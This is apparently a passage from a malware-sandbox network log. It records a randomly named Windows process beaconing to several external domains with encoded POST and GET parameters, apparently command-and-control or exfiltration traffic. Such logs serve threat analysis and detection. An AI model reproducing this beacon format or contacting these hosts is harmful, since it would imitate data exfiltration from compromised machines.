                                                                            Dec 10, 2024 16:24:01.517070055 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:07 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            2 | 192.168.2.5 | 49802 | 180.178.39.236 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:02.772902012 CET | 799 | OUT | POST /tizt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.73613.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.73613.shop
                                                                            Referer: http://www.73613.shop/tizt/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=nkKelaCdXUds+L88vzb0xLhoOC1uO+yAI9itn+lFfqUt4t9wA32Sc0voAH68du336uFvkhrz4SUhofdb1gPZqPFvsr/698keghkJ6UW6e+PqVmLUBumtSjPqHqr8nhqrFkMYNPP+o/Vd/LhirQIxnffMvF3rRzG2GPdJApTr18IOdJCeD/wt6fH/JYUVp0N4L500y96MIdnYz2uao9gLOAlGdRHu
                                                                            Dec 10, 2024 16:24:04.236289024 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:10 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            3 | 192.168.2.5 | 49808 | 180.178.39.236 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:05.439795971 CET | 1816 | OUT | POST /tizt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.73613.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.73613.shop
                                                                            Referer: http://www.73613.shop/tizt/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC= [TRUNCATED]
                                                                            Dec 10, 2024 16:24:06.935085058 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:13 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            4 | 192.168.2.5 | 49816 | 180.178.39.236 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:08.087457895 CET | 530 | OUT | GET /tizt/?UTJ0bhC=qmi+mqOOYFdY+IQEwG2FxqFWHTg0Nvqmcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxg8Ma1a6j66cDsm0o40uJcJz1cVDMGreiQH32Lp7znSrnRg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.73613.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:24:09.611648083 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            5 | 192.168.2.5 | 49833 | 203.161.49.193 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:15.241458893 CET | 797 | OUT | POST /n54u/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.eco-tops.website
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.eco-tops.website
                                                                            Referer: http://www.eco-tops.website/n54u/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=jntZs3mRZ7WZSr2N+NwMqEcOo+nBhqJD9PGhklYqC+24eHmNS4ZVnUizQl/IGdNf4suW0NuRkLqAUrWdBgB/lIgudwXkYY7kTMkJnQwT+ydqaYnazDSfWm0FnzbO5Pt3jb9hbCda8qWA6/ifCSk+G3iyyk7+A/xHVTqXHXEwRD81f+ZAg73ySBhJGs662VQmjPsp0Js=
                                                                            Dec 10, 2024 16:24:16.446311951 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            6 | 192.168.2.5 | 49839 | 203.161.49.193 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:17.907798052 CET | 817 | OUT | POST /n54u/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.eco-tops.website
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.eco-tops.website
                                                                            Referer: http://www.eco-tops.website/n54u/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=jntZs3mRZ7WZQJiN8qsMiEcN1OnBvKJH9PKhknoADLm4fiaNT8NVmUizIV/RL9NE4sTl0MSRkLOAUrmdBTp4kYgsJAXmHI7kTMkJnQ01+yFqbrPaziScXm0ExjbOufsfjb9DbDRg8sSA67mfCDk9P3iOsU7uIdlMSzeEI1UxJiUQTooq6Z/aBhNxW/yNnlxP5s8Zqe5YfFI86fjBAUg1zKIaTIk5
                                                                            Dec 10, 2024 16:24:19.126084089 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:18 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.5 | 49845 | 203.161.49.193 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:20.560628891 CET | 1834 | OUT | POST /n54u/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.eco-tops.website
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.eco-tops.website
                                                                            Referer: http://www.eco-tops.website/n54u/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=jntZs3mRZ7WZQJiN8qsMiEcN1OnBvKJH9PKhknoADLu4fUONSelV8UizWl/UL9NJ4s6N0MeBkJmAVKGdJCp49IgsLAXrYY6wTM0FnQk1+yFqbtza0zScVm0FnzbC5PtyjaU+bDUd/cyA5b2fRBc9A3i2tU6xId4USzy2I0hWJhEQX9dr95zhQwlhZsmq9D5SxMkhj/A8QkUCxY3sFnt+hOAJeIJEnbfpWZtFpWwYt4owAXVstxvKk1kytH6ayaAsl4mBLj3gQNj18/Ghawn2Da0wvyX9HDd2rO1/9mJ8fwgoyYfo7dxEWNA8a/mzyOkRXmm8qDmhZkfhfcfa1D18TAGRTCEOVXPqSsLeXGob/t4AX0wLebaqjOSODYfzK2kSN6dgf8jggY1jIp/3iZiDX9Mf2Tqc6b+Af4LjXhBGX10kbs9OAR9eYIrLFjEd2TppXkKsMmMtTUs5i+tucWjWeudoWjOAz8T2Al86PLrmrhdMagWuEkv3bieNK0IFqNm2dxtl6e+EgjlpJ06jqFWBhES/8ELC9wuc1r9gmLtSXuJ1QDS42C9BmIPexRUpQeRNXPfCwsKIM/mkebj8TG6tA8gUPXMV49NT0fQbV++2Bl0E3qZQq9W3f0jXbhQAZkEjJNHGVqFFAstfsO2w+zFse8iZo1uXuz1xMsazN8CEPxMHjhBGCZHT+/YscMWQmAKzR1yMNFNk4wgfOMeI4IthQKjkEGaLmLWsgMpBgHaZVOP3ouK5m7xTbmRuanPivMxaN87qlf2J57u/RtRtOabjCA67zlt3uonr+hXvRfW+XSuHzdv8eIkoucQnZVL/NghnmvuJHYBkdkPBla1yeQ2ZQND4PasCCOrx04WZy2RIeSQNlBOE1sakhbcwhy57/3n/sIlG1byE+R37MkrZJZ/imk3C22VcROY5EFeOizZVueuPr+JKaVcxQ3ObaUj3jgJiqFO3oUSOunrOwibcy4F0My0oLCXd0xckg32bHlamDMhD [TRUNCATED]
                                                                            Dec 10, 2024 16:24:21.845319033 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:21 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            8 | 192.168.2.5 | 49854 | 203.161.49.193 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:24:23.212694883 CET | 536 | OUT | GET /n54u/?UTJ0bhC=ulF5vHaDZay2YbeuiqBK2WYi+52Jh6JWqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2tti5seczbyW8/HcZoVhAsi6mpRcK6hsQ2VCyFx3Djg7K8V+w==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.eco-tops.website
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:24:24.436480999 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:24 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49872 | 217.160.0.132 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:30.634263039 CET | 785 | OUT | POST /8u3q/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.astrext.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.astrext.info
                                                                            Referer: http://www.astrext.info/8u3q/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=RkQOYEjoxVItK4hlc1MY3pMR3mcGbzn4wisrdyxL41cDrgIJ9jsJSq4P/uiKdilvDqHTUZAWK/pPJ3vI8kf6Cizfn21Svbf008GRZSlvO0VAqumq8pEr9PtX33JWQ+47kBjBnIb7A+gnEmLn10e9NwsV7zlnKO8nJ13/8t6SrpVz3vNIPuBKqX/Te8qVrogky/9iXPM=
Dec 10, 2024 16:24:31.924860001 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:31 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49878 | 217.160.0.132 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:33.295638084 CET | 805 | OUT | POST /8u3q/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.astrext.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.astrext.info
                                                                            Referer: http://www.astrext.info/8u3q/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4G4DoB4JvWAJRq4PqejATCl4DqasUc4WK/9PJ2fI/Tr5YSzd8m1csrf008GRZShVO0NAqeWqmMw0hftUnHJWU+43kBiknMasA9YnEn7n1le6eQsb0TkzLMhTAUXkjOXar7N0758iVMJi53TrOvii6YBNoctSJYbZsjYQCohAKaBPvKQ2GnS7
Dec 10, 2024 16:24:34.583764076 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:34 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49884 | 217.160.0.132 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:35.988241911 CET | 1822 | OUT | POST /8u3q/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.astrext.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.astrext.info
                                                                            Referer: http://www.astrext.info/8u3q/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4GwDozwJ+F4JQq4PrejDTCk6DqTlUcEgK55PGwDI+ir5Wizd1G1dvbe20/uvZTRVO0NAqcOqoJE0jftX33IZQ+5okB7ZnMO8BN4nFHrn3X26EQsO9Dk7LMtMAULgjOTwr5d054lDGfBlqBaKDvGQk4R8vNwmIrj3w3EcIOBfJI8Csto2ISjkDHJhKh46L3wltkqdENOptqSq9nNJTZRdl7wrUZH2nQaqfqFoCJYbzz6Eg091QBojbM+Hoj4LoxGELzCzbfIaW/Ga4EKJUSk4oL/wOTvRHO17efwKq40yOeJ51npXA0qVAmGIrnU6SRjc757r2P7WbmvD94vBRl5XFCw0I4WRWkN9iuF7tjSQW841y/oQduXCc4B/LL3lqtiUZT7ss5bcolGgSM1dqUl2NdOzJUGQ6X6Az6r9HDZKbGvliL5tsbvCqGUQO+qqP1RSUh49x6zP8Mpd0ixhH9IUojT37rNArVVjsjHeDiRsWBAVp2oGlxQe1rNDxlWlK/dr77BmPxUHK9J9VhBWdF/gPHe3lWvJ0hrA/UqfhpRq4VlkIAQGTrlTJxxjCFOAjFZ3NJihRMOoeRwy0CBtsNS4nFZ/v4PwuYAcWaZ8LvEcfgo+EOIT9ON70wAzlkbQzmSolmLu5AOB/BiDv554QHT3gf0UV9HxQa+6cNVVaUQh3mg7OD9TK5+hnuDEADKQ/Ns502OstekmLfAKv+VEW4wnBm5ko0pz9v2vsMjFW1Qe6isC1oPco5G9HHAqxGKjyBk+t/Yx/uIpuUGgEUc4tEsuBdhBKBh0CQfT7iJ1OyEinQOFKE+X7SbQ2kZtVk5VK1PrSPR4QpX5uf41mqVSM/IZIsjA2P1krQkiCb94Y1oi4iL1lYYjacH0OSzKzP3BlQb1wrfF+SwEjydwPyyod5Gdh+3r14sWOxE9V3qXdqN56D1BxAP0kTyiS3XC4D3kuieT0mas [TRUNCATED]
Dec 10, 2024 16:24:37.361088991 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:37 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49894 | 217.160.0.132 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:38.658546925 CET | 532 | OUT | GET /8u3q/?UTJ0bhC=cm4ubz77/lIwMrhkdRh+pZgL/Bl5XR/XxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJch/nk290kcPG1JSPbhB/GQRlqu+N9s0n8p9+2HNGTNszmQ==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.astrext.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:24:39.938147068 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 1271
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:39 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
Dec 10, 2024 16:24:39.938679934 CET | 203 | IN
                                                                            Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49911 | 216.40.34.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:46.054102898 CET | 797 | OUT | POST /f83s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.newhopetoday.app
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.newhopetoday.app
                                                                            Referer: http://www.newhopetoday.app/f83s/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=Yg2q5oZ/ZoKoYPeygz1koX1+tKsdpmIQrCE0XJTdbNpoPkKZofPi/i8oEfb5X76fTHedDucVp5KOD9vU4E3WJ4ZKC8nLq7RVG4yH+rBVLwthElP3w5ct6U4TgqZIp2oWuCXPqoOMxkBzLCNXN0oY7G+dkxdbeSpoaECLbs3CpE6kZozU5KtwqMGys/SmE9dIlDj76C8=
Dec 10, 2024 16:24:47.191873074 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            content-type: text/html; charset=UTF-8
                                                                            x-request-id: 679f2543-3481-4a3d-a4e3-5e9e2ad5c117
                                                                            x-runtime: 0.029777
                                                                            content-length: 17134
                                                                            connection: close
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Dec 10, 2024 16:24:47.192409992 CET | 1236 | IN
                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Dec 10, 2024 16:24:47.192423105 CET | 448 | IN
                                                                            Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Dec 10, 2024 16:24:47.193926096 CET | 1236 | IN
                                                                            Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
Dec 10, 2024 16:24:47.193939924 CET | 1236 | IN
                                                                            Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                                                            Dec 10, 2024 16:24:47.196099043 CET1236INData Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69
